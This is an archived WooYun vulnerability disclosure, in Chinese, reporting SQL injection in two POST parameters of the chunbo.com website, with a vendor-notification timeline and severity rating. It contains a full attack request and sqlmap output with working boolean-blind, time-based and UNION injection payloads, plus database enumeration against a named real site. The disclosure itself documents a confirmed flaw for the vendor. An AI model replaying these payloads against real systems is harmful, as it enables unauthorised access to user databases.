乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-25: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经确认,细节仅向厂商公开 2016-01-04: 细节向核心白帽子及相关领域专家公开 2016-01-14: 细节向普通白帽子公开 2016-01-24: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
圣诞节到了···有礼物不?
POST数据包:
POST /Category/getBrotherCategoryListByPid HTTP/1.1X-Forwarded-For: 8.8.8.8'Content-Length: 53Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.chunbo.com:80/Cookie: PHPSESSID=b7g95km28gmlkuuj1ifumi2av6; cb_site_id=1; cb_site_name=%E5%8C%97%E4%BA%AC; cb_is_reg_info=1; _pk_ref.1151.b7bb=%5B%22%22%2C%22%22%2C1450954569%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1151.b7bb=5ffe0accbe4f2f4e.1450954569.1.1450954569.1450954569.; _pk_ses.1151.b7bb=*Host: www.chunbo.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*pid=188&site_id=1
pid 参数 和 site_id 参数 均可注入
其中 memberdb 是存储用户信息的
看了下字段
POST parameter 'site_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: pid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=188) AND 6610=6610 AND (6333=6333&site_id=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: pid=188) AND (SELECT * FROM (SELECT(SLEEP(5)))SSlX) AND (8244=8244&site_id=1 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: pid=188) UNION ALL SELECT CONCAT(0x7162767a71,0x4a476f735370726c4a57,0x7176767a71),NULL,NULL-- &site_id=1Parameter: site_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=188&site_id=1 AND 2328=2328 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: pid=188&site_id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x6d63564b494a6374424f,0x7176767a71),NULL-----there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: pid, type: Unescaped numeric (default)[1] place: POST, parameter: site_id, type: Unescaped numeric[q] Quit> 0[18:59:50] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.5.29, PHP 5.5.30back-end DBMS: MySQL 5.0.12[18:59:50] [INFO] fetching database namesavailable databases [14]: mask 区域 *****dmi**********alog**********msd**********onf**********kboo**********ron**********ron**********tion_s**********fore**********emb**********miss**********moti**********evi********** t***** [18:59:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.chunbo.com'
*****dmi**********alog**********msd**********onf**********kboo**********ron**********ron**********tion_s**********fore**********emb**********miss**********moti**********evi********** t*****
[18:59:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.chunbo.com'
危害等级:高
漏洞Rank:20
确认时间:2015-12-25 13:47
谢谢。
暂无